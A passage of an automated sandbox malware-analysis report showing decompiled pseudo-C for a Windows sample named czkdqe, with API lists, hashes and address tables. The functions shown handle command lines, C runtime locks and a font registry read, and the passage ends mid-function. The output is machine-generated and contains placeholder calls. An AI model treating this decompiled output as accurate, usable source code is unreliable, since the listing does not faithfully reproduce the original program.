                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2096502293-0
                                                                                    • Opcode ID: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
                                                                                    • Instruction ID: 3a30abc31a22bbec39353dc46f3e4c67e205073161841612e8df996d8f39c960
                                                                                    • Opcode Fuzzy Hash: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
                                                                                    • Instruction Fuzzy Hash: 73014B71BD02187AF6242B36AC4BFFB2D1DDB81B51F148421B706EA0E2C9E558418964
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 55%
                                                                                    			E00401F93(WCHAR* __eax) {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				signed int _t17;
                                                                                    				signed int _t18;
                                                                                    				WCHAR* _t19;
                                                                                    				WCHAR* _t20;
                                                                                    				WCHAR* _t26;
                                                                                    				void* _t29;
                                                                                    				void* _t34;
                                                                                    				long _t35;
                                                                                    				signed int _t39;
                                                                                    				signed int _t40;
                                                                                    				signed int _t41;
                                                                                    				void* _t45;
                                                                                    				RECT* _t46;
                                                                                    				WCHAR* _t47;
                                                                                    				WCHAR* _t48;
                                                                                    
                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                    				_t35 = 2;
                                                                                    				_t48 = __eax;
                                                                                    				_t45 = 0x20;
                                                                                    				L2:
                                                                                    				if( *_t48 == _t45) {
                                                                                    					_t48 = _t48 + _t35;
                                                                                    					goto L2;
                                                                                    				}
                                                                                    				_t17 =  *_t48 & 0x0000ffff;
                                                                                    				_t39 = (0 | _t17 == 0x00000022) + (0 | _t17 == 0x00000022) + 0x00000020 & 0x0000ffff;
                                                                                    				if(_t17 == _t39) {
                                                                                    					_t48 = _t48 + _t35;
                                                                                    				}
                                                                                    				_t46 = 0;
                                                                                    				while(1) {
                                                                                    					_t18 =  *_t48 & 0x0000ffff;
                                                                                    					if(_t18 == _t46) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t18 == _t39) {
                                                                                    						L10:
                                                                                    						_t48 = _t48 + _t35;
                                                                                    						L11:
                                                                                    						if( *_t48 == _t45) {
                                                                                    							goto L10;
                                                                                    						}
                                                                                    						_t19 = _t48;
                                                                                    						while(1) {
                                                                                    							_t40 =  *_t19 & 0x0000ffff;
                                                                                    							if(_t40 != _t45 && _t40 != 0x2d && _t40 != 0x2f) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t19 = _t19 + _t35;
                                                                                    							if(_t40 == _t45) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							_t41 =  *_t19 & 0x0000ffff;
                                                                                    							if(_t41 == _t46) {
                                                                                    								L19:
                                                                                    								if( *_t19 == _t45) {
                                                                                    									goto L18;
                                                                                    								}
                                                                                    								if(_t41 == 0x50 || _t41 == 0x70) {
                                                                                    									if(_v8 == _t46) {
                                                                                    										_v8 = 1;
                                                                                    										_t48 = _t19;
                                                                                    									}
                                                                                    								}
                                                                                    								continue;
                                                                                    							}
                                                                                    							L18:
                                                                                    							_t19 = _t19 + _t35;
                                                                                    							goto L19;
                                                                                    						}
                                                                                    						_t20 =  *_t48 & 0x0000ffff;
                                                                                    						if(_t20 == _t46) {
                                                                                    							L41:
                                                                                    							return _t20;
                                                                                    						}
                                                                                    						if(_t20 != 0x22) {
                                                                                    							L30:
                                                                                    							0x400000(_t48);
                                                                                    							if(_t20 != 0) {
                                                                                    								L33:
                                                                                    								0x400000(_t48, 0xffffffff);
                                                                                    								_t20 = InvalidateRect( *0x415f64, _t46, _t46);
                                                                                    								if(_v8 == _t46) {
                                                                                    									goto L41;
                                                                                    								}
                                                                                    								0x400000();
                                                                                    								return _t20;
                                                                                    							}
                                                                                    							_t47 = L".txt";
                                                                                    							lstrcpynW( &_v528, _t48, 0x103 - lstrlenW(_t47));
                                                                                    							lstrcatW( &_v528, _t47);
                                                                                    							_t48 =  &_v528;
                                                                                    							_t26 = _t48;
                                                                                    							0x400000(_t26);
                                                                                    							if(_t26 == 0) {
                                                                                    								_t29 = E00401F1C( &_v528) - _t35;
                                                                                    								if(_t29 == 0) {
                                                                                    									return DestroyWindow( *0x415f64);
                                                                                    								}
                                                                                    								_t20 = _t29 - 4;
                                                                                    								if(_t20 != 0) {
                                                                                    									goto L41;
                                                                                    								}
                                                                                    								E0040101C( &_v528, 0);
                                                                                    								_t34 = CreateFileW( &_v528, 0x40000000, _t35, 0, 4, 0x80, 0);
                                                                                    								if(_t34 != 0xffffffff) {
                                                                                    									_t34 = CloseHandle(_t34);
                                                                                    								}
                                                                                    								0x400000();
                                                                                    								return _t34;
                                                                                    							}
                                                                                    							_t46 = 0;
                                                                                    							goto L33;
                                                                                    						}
                                                                                    						_t48 = _t48 + _t35;
                                                                                    						_t20 = _t48;
                                                                                    						if( *_t48 == _t46) {
                                                                                    							L29:
                                                                                    							 *_t20 = 0;
                                                                                    							goto L30;
                                                                                    						}
                                                                                    						while( *_t20 != 0x22) {
                                                                                    							_t20 = _t20 + _t35;
                                                                                    							if( *_t20 != _t46) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							goto L29;
                                                                                    						}
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					_t48 = _t48 + _t35;
                                                                                    				}
                                                                                    				if( *_t48 != _t39) {
                                                                                    					goto L11;
                                                                                    				}
                                                                                    				goto L10;
                                                                                    			}




















                                                                                    0x00401f9c
                                                                                    0x00401fa5
                                                                                    0x00401fa8
                                                                                    0x00401faa
                                                                                    0x00401faf
                                                                                    0x00401fb2
                                                                                    0x00401fad
                                                                                    0x00000000
                                                                                    0x00401fad
                                                                                    0x00401fb4
                                                                                    0x00401fc3
                                                                                    0x00401fc9
                                                                                    0x00401fcb
                                                                                    0x00401fcb
                                                                                    0x00401fcd
                                                                                    0x00401fd8
                                                                                    0x00401fd8
                                                                                    0x00401fde
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401fd4
                                                                                    0x00401fe5
                                                                                    0x00401fe5
                                                                                    0x00401fe7
                                                                                    0x00401fea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401fec
                                                                                    0x00401fee
                                                                                    0x00401fee
                                                                                    0x00401ff4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402000
                                                                                    0x00402005
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402007
                                                                                    0x0040200d
                                                                                    0x00402011
                                                                                    0x00402014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402019
                                                                                    0x00402023
                                                                                    0x00402025
                                                                                    0x0040202c
                                                                                    0x0040202c
                                                                                    0x00402023
                                                                                    0x00000000
                                                                                    0x00402019
                                                                                    0x0040200f
                                                                                    0x0040200f
                                                                                    0x00000000
                                                                                    0x0040200f
                                                                                    0x00402030
                                                                                    0x00402036
                                                                                    0x0040212f
                                                                                    0x0040212f
                                                                                    0x0040212f
                                                                                    0x0040203f
                                                                                    0x0040205c
                                                                                    0x0040205d
                                                                                    0x00402064
                                                                                    0x004020aa
                                                                                    0x004020ad
                                                                                    0x004020ba
                                                                                    0x004020c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004020c5
                                                                                    0x00000000
                                                                                    0x004020c5
                                                                                    0x00402066
                                                                                    0x00402082
                                                                                    0x00402090
                                                                                    0x00402096
                                                                                    0x0040209c
                                                                                    0x0040209f
                                                                                    0x004020a6
                                                                                    0x004020d8
                                                                                    0x004020da
                                                                                    0x00000000
                                                                                    0x00402125
                                                                                    0x004020dc
                                                                                    0x004020df
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004020eb
                                                                                    0x00402106
                                                                                    0x0040210f
                                                                                    0x00402112
                                                                                    0x00402112
                                                                                    0x00402118
                                                                                    0x00000000
                                                                                    0x00402118
                                                                                    0x004020a8
                                                                                    0x00000000
                                                                                    0x004020a8
                                                                                    0x00402041
                                                                                    0x00402043
                                                                                    0x00402048
                                                                                    0x00402057
                                                                                    0x00402059
                                                                                    0x00000000
                                                                                    0x00402059
                                                                                    0x0040204a
                                                                                    0x00402050
                                                                                    0x00402055
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402055
                                                                                    0x00000000
                                                                                    0x0040204a
                                                                                    0x00401fd6
                                                                                    0x00401fd6
                                                                                    0x00401fe3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(.txt), ref: 0040206C
                                                                                    • lstrcpynW.KERNEL32(?,?,00000103), ref: 00402082
                                                                                    • lstrcatW.KERNEL32(?,.txt), ref: 00402090
                                                                                    • InvalidateRect.USER32(00000000,00000000,?,000000FF), ref: 004020BA
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,?,00000103), ref: 00402106
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000103), ref: 00402112
                                                                                    • DestroyWindow.USER32(?,00000103), ref: 00402125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDestroyFileHandleInvalidateRectWindowlstrcatlstrcpynlstrlen
                                                                                    • String ID: .txt
                                                                                    • API String ID: 1344828188-2195685702
                                                                                    • Opcode ID: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
                                                                                    • Instruction ID: d28bfcdb09bc5182ac3aec5d8d3b4e3140d473f0e5bda905505ba1bfea716dd4
                                                                                    • Opcode Fuzzy Hash: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
                                                                                    • Instruction Fuzzy Hash: CB4126729002219ADB306B619D8CBBB76A8DB54318F65413BF542F72E1E7BD4EC1C358
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E00406359(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				intOrPtr* _t49;
                                                                                    				struct _CRITICAL_SECTION* _t50;
                                                                                    				struct _CRITICAL_SECTION* _t54;
                                                                                    				intOrPtr _t55;
                                                                                    				struct _CRITICAL_SECTION* _t57;
                                                                                    				signed int _t62;
                                                                                    				struct _CRITICAL_SECTION* _t67;
                                                                                    				void* _t82;
                                                                                    				struct _CRITICAL_SECTION* _t84;
                                                                                    				signed int _t86;
                                                                                    				void* _t87;
                                                                                    
                                                                                    				_t82 = __edx;
                                                                                    				_push(0x10);
                                                                                    				_push(0x4120d8);
                                                                                    				E00405990(__ebx, __edi, __esi);
                                                                                    				_t84 = 0;
                                                                                    				 *(_t87 - 0x1c) = 0;
                                                                                    				E0040A357(0, 0, 1);
                                                                                    				 *((intOrPtr*)(_t87 - 4)) = 0;
                                                                                    				_t86 = 0;
                                                                                    				while(1) {
                                                                                    					 *(_t87 - 0x20) = _t86;
                                                                                    					if(_t86 >=  *0x4182a0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t49 =  *0x417284 + _t86 * 4;
                                                                                    					if( *_t49 == 0) {
                                                                                    						_t50 = E00408BFA(0x38);
                                                                                    						 *( *0x417284 + _t86 * 4) = _t50;
                                                                                    						__eflags = _t50;
                                                                                    						if(_t50 != 0) {
                                                                                    							_t54 = InitializeCriticalSectionAndSpinCount( *( *0x417284 + _t86 * 4) + 0x20, 0xfa0);
                                                                                    							__eflags = _t54;
                                                                                    							_t55 =  *0x417284;
                                                                                    							if(_t54 != 0) {
                                                                                    								_t57 =  *((intOrPtr*)(_t55 + _t86 * 4)) + 0x20;
                                                                                    								__eflags = _t57;
                                                                                    								EnterCriticalSection(_t57);
                                                                                    								_t84 =  *( *0x417284 + _t86 * 4);
                                                                                    								 *(_t87 - 0x1c) = _t84;
                                                                                    								 *(_t84 + 0xc) = 0;
                                                                                    							} else {
                                                                                    								E00408BC0( *((intOrPtr*)(_t55 + _t86 * 4)));
                                                                                    								 *( *0x417284 + _t86 * 4) = 0;
                                                                                    							}
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_t62 =  *( *_t49 + 0xc);
                                                                                    					if((_t62 & 0x00000083) != 0 || (_t62 & 0x00008000) != 0) {
                                                                                    						L9:
                                                                                    						_t86 = _t86 + 1;
                                                                                    						continue;
                                                                                    					} else {
                                                                                    						_t11 = _t86 - 3; // -3
                                                                                    						_t94 = _t11 - 0x10;
                                                                                    						if(_t11 > 0x10) {
                                                                                    							L7:
                                                                                    							E004058F0(_t86,  *( *0x417284 + _t86 * 4));
                                                                                    							_t67 =  *( *0x417284 + _t86 * 4);
                                                                                    							if(( *(_t67 + 0xc) & 0x00000083) == 0) {
                                                                                    								_t84 = _t67;
                                                                                    								 *(_t87 - 0x1c) = _t84;
                                                                                    								break;
                                                                                    							} else {
                                                                                    								E0040595E(_t86, _t67);
                                                                                    								goto L9;
                                                                                    							}
                                                                                    						}
                                                                                    						_t12 = _t86 + 0x10; // 0x10
                                                                                    						if(E0040A295(0, _t82, _t84, _t86, _t94) == 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						goto L7;
                                                                                    					}
                                                                                    				}
                                                                                    				__eflags = _t84;
                                                                                    				if(_t84 != 0) {
                                                                                    					 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00008000;
                                                                                    					 *((intOrPtr*)(_t84 + 4)) = 0;
                                                                                    					 *((intOrPtr*)(_t84 + 8)) = 0;
                                                                                    					 *_t84 = 0;
                                                                                    					 *((intOrPtr*)(_t84 + 0x1c)) = 0;
                                                                                    					_t40 = _t84 + 0x10;
                                                                                    					 *_t40 =  *(_t84 + 0x10) | 0xffffffff;
                                                                                    					__eflags =  *_t40;
                                                                                    				}
                                                                                    				 *((intOrPtr*)(_t87 - 4)) = 0xfffffffe;
                                                                                    				E00406483();
                                                                                    				return E004059D5(_t84);
                                                                                    			}














                                                                                    0x00406359
                                                                                    0x00406359
                                                                                    0x0040635b
                                                                                    0x00406360
                                                                                    0x00406367
                                                                                    0x00406369
                                                                                    0x0040636e
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x00406379
                                                                                    0x00406379
                                                                                    0x00406382
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040638d
                                                                                    0x00406392
                                                                                    0x004063f1
                                                                                    0x004063fd
                                                                                    0x00406400
                                                                                    0x00406402
                                                                                    0x00406415
                                                                                    0x0040641b
                                                                                    0x0040641d
                                                                                    0x00406422
                                                                                    0x0040643a
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406449
                                                                                    0x0040644c
                                                                                    0x0040644f
                                                                                    0x00406424
                                                                                    0x00406427
                                                                                    0x00406432
                                                                                    0x00406432
                                                                                    0x00406422
                                                                                    0x00000000
                                                                                    0x00406402
                                                                                    0x00406396
                                                                                    0x0040639b
                                                                                    0x004063e5
                                                                                    0x004063e5
                                                                                    0x00000000
                                                                                    0x004063a4
                                                                                    0x004063a4
                                                                                    0x004063a7
                                                                                    0x004063aa
                                                                                    0x004063be
                                                                                    0x004063c7
                                                                                    0x004063d3
                                                                                    0x004063da
                                                                                    0x004063e8
                                                                                    0x004063ea
                                                                                    0x00000000
                                                                                    0x004063dc
                                                                                    0x004063de
                                                                                    0x00000000
                                                                                    0x004063e4
                                                                                    0x004063da
                                                                                    0x004063ac
                                                                                    0x004063b8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063b8
                                                                                    0x0040639b
                                                                                    0x00406452
                                                                                    0x00406454
                                                                                    0x00406456
                                                                                    0x0040645d
                                                                                    0x00406460
                                                                                    0x00406463
                                                                                    0x00406465
                                                                                    0x00406468
                                                                                    0x00406468
                                                                                    0x00406468
                                                                                    0x00406468
                                                                                    0x0040646c
                                                                                    0x00406473
                                                                                    0x0040647f

                                                                                    APIs
                                                                                      • Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
                                                                                      • Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
                                                                                      • Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381
                                                                                    • __mtinitlocknum.LIBCMT ref: 004063B0
                                                                                    • __malloc_crt.LIBCMT ref: 004063F1
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,004120D8,00000010,00403123,00412030,0000000C,004031A1,?,?,00000040,?,004025E0,?,00410660), ref: 00406415
                                                                                    • _free.LIBCMT ref: 00406427
                                                                                    • EnterCriticalSection.KERNEL32(?,?,004025E0,?,00410660), ref: 0040643E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                                                                                    • String ID: ?
                                                                                    • API String ID: 2015852156-3428610318
                                                                                    • Opcode ID: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
                                                                                    • Instruction ID: b9cd1371c41a4ab66219e786f190016f3e2e04b6ac3045ceef4f163d49476006
                                                                                    • Opcode Fuzzy Hash: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
                                                                                    • Instruction Fuzzy Hash: 523170715046019FC710DFA9D481A5AB7F4BB08324B5181BFF496A72D2CB79D4528F4D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E0040717C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				intOrPtr _t26;
                                                                                    				intOrPtr _t30;
                                                                                    				intOrPtr _t39;
                                                                                    				void* _t40;
                                                                                    
                                                                                    				_t31 = __ebx;
                                                                                    				_push(8);
                                                                                    				_push(0x412118);
                                                                                    				E00405990(__ebx, __edi, __esi);
                                                                                    				GetModuleHandleW(L"KERNEL32.DLL");
                                                                                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x411108;
                                                                                    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                                    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                    				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                    				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                    				 *(_t39 + 0x68) = 0x414588;
                                                                                    				E0040A357(__ebx, 1, 0xd);
                                                                                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                    				InterlockedIncrement( *(_t39 + 0x68));
                                                                                    				 *(_t40 - 4) = 0xfffffffe;
                                                                                    				E0040721E();
                                                                                    				E0040A357(_t31, 1, 0xc);
                                                                                    				 *(_t40 - 4) = 1;
                                                                                    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                                    				if(_t26 == 0) {
                                                                                    					_t30 =  *0x414cf0; // 0x414c18
                                                                                    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                                    				}
                                                                                    				E00408700( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                    				 *(_t40 - 4) = 0xfffffffe;
                                                                                    				return E004059D5(E00407227());
                                                                                    			}







                                                                                    0x0040717c
                                                                                    0x0040717c
                                                                                    0x0040717e
                                                                                    0x00407183
                                                                                    0x0040718d
                                                                                    0x00407193
                                                                                    0x00407196
                                                                                    0x0040719d
                                                                                    0x004071a4
                                                                                    0x004071a7
                                                                                    0x004071aa
                                                                                    0x004071b1
                                                                                    0x004071b8
                                                                                    0x004071c1
                                                                                    0x004071c7
                                                                                    0x004071ce
                                                                                    0x004071d4
                                                                                    0x004071db
                                                                                    0x004071e2
                                                                                    0x004071e8
                                                                                    0x004071eb
                                                                                    0x004071ee
                                                                                    0x004071f3
                                                                                    0x004071f5
                                                                                    0x004071fa
                                                                                    0x004071fa
                                                                                    0x00407200
                                                                                    0x00407206
                                                                                    0x00407217

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412118,00000008,00407284,00000000,00000000,?,004033DA,004029D6,?,?,?,004029D6,00000000,?), ref: 0040718D
                                                                                    • __lock.LIBCMT ref: 004071C1
                                                                                      • Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
                                                                                      • Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
                                                                                      • Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 004071CE
                                                                                    • __lock.LIBCMT ref: 004071E2
                                                                                    • ___addlocaleref.LIBCMT ref: 00407200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                    • String ID: KERNEL32.DLL
                                                                                    • API String ID: 637971194-2576044830
                                                                                    • Opcode ID: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
                                                                                    • Instruction ID: 828e2d9a6aef1ecd1850dd2157baaa58032c3ea6c81483b33c0403e429775c2e
                                                                                    • Opcode Fuzzy Hash: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
                                                                                    • Instruction Fuzzy Hash: 18016571844B00EBD710DF6AD805749FBE0BF54325F20891FE599663E1CBB8A544CF19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 81%
                                                                                    			E0040823F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _t15;
                                                                                    				LONG* _t21;
                                                                                    				void* _t31;
                                                                                    				LONG* _t33;
                                                                                    				void* _t34;
                                                                                    				void* _t35;
                                                                                    
                                                                                    				_t35 = __eflags;
                                                                                    				_t29 = __edx;
                                                                                    				_t25 = __ebx;
                                                                                    				_push(0xc);
                                                                                    				_push(0x4121a8);
                                                                                    				E00405990(__ebx, __edi, __esi);
                                                                                    				_t31 = E004072A9(__ebx, __edx, _t35);
                                                                                    				_t15 =  *0x414aa8; // 0xfffffffe
                                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                    					E0040A357(_t25, _t31, 0xd);
                                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                                    					__eflags = _t33 -  *0x4149b0; // 0x2292b90
                                                                                    					if(__eflags != 0) {
                                                                                    						__eflags = _t33;
                                                                                    						if(__eflags != 0) {
                                                                                    							__eflags = InterlockedDecrement(_t33);
                                                                                    							if(__eflags == 0) {
                                                                                    								__eflags = _t33 - 0x414588;
                                                                                    								if(__eflags != 0) {
                                                                                    									E00408BC0(_t33);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_t21 =  *0x4149b0; // 0x2292b90
                                                                                    						 *(_t31 + 0x68) = _t21;
                                                                                    						_t33 =  *0x4149b0; // 0x2292b90
                                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                                    						InterlockedIncrement(_t33);
                                                                                    					}
                                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                                    					E004082DA();
                                                                                    				} else {
                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                    				}
                                                                                    				_t38 = _t33;
                                                                                    				if(_t33 == 0) {
                                                                                    					_push(0x20);
                                                                                    					E004069B9(_t29, _t38);
                                                                                    				}
                                                                                    				return E004059D5(_t33);
                                                                                    			}









                                                                                    0x0040823f
                                                                                    0x0040823f
                                                                                    0x0040823f
                                                                                    0x0040823f
                                                                                    0x00408241
                                                                                    0x00408246
                                                                                    0x00408250
                                                                                    0x00408252
                                                                                    0x0040825a
                                                                                    0x0040827b
                                                                                    0x00408281
                                                                                    0x00408285
                                                                                    0x00408288
                                                                                    0x0040828b
                                                                                    0x00408291
                                                                                    0x00408293
                                                                                    0x00408295
                                                                                    0x0040829e
                                                                                    0x004082a0
                                                                                    0x004082a2
                                                                                    0x004082a8
                                                                                    0x004082ab
                                                                                    0x004082b0
                                                                                    0x004082a8
                                                                                    0x004082a0
                                                                                    0x004082b1
                                                                                    0x004082b6
                                                                                    0x004082b9
                                                                                    0x004082bf
                                                                                    0x004082c3
                                                                                    0x004082c3
                                                                                    0x004082c9
                                                                                    0x004082d0
                                                                                    0x00408262
                                                                                    0x00408262
                                                                                    0x00408262
                                                                                    0x00408265
                                                                                    0x00408267
                                                                                    0x00408269
                                                                                    0x0040826b
                                                                                    0x00408270
                                                                                    0x00408278

                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0040824B
                                                                                      • Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
                                                                                      • Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9
                                                                                    • __amsg_exit.LIBCMT ref: 0040826B
                                                                                    • __lock.LIBCMT ref: 0040827B
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00408298
                                                                                    • _free.LIBCMT ref: 004082AB
                                                                                    • InterlockedIncrement.KERNEL32(02292B90), ref: 004082C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 3470314060-0
                                                                                    • Opcode ID: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
                                                                                    • Instruction ID: 9dd0b61804cb2939324514bc7d4c0d8b777e788f75e63934b552d476fc708038
                                                                                    • Opcode Fuzzy Hash: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
                                                                                    • Instruction Fuzzy Hash: 5D018E71901B11EBCA10AB66A645B9A7760AB44760F1540BFE854732C0CB3C68918B9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00401051() {
                                                                                    				char _v8;
                                                                                    				void* _v12;
                                                                                    				int _v16;
                                                                                    				int _v20;
                                                                                    				long _t17;
                                                                                    				char _t19;
                                                                                    
                                                                                    				_t19 = 0x60;
                                                                                    				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v12) == 0) {
                                                                                    					_v16 = 4;
                                                                                    					_t17 = RegQueryValueExW(_v12, L"LogPixels", 0,  &_v20,  &_v8,  &_v16);
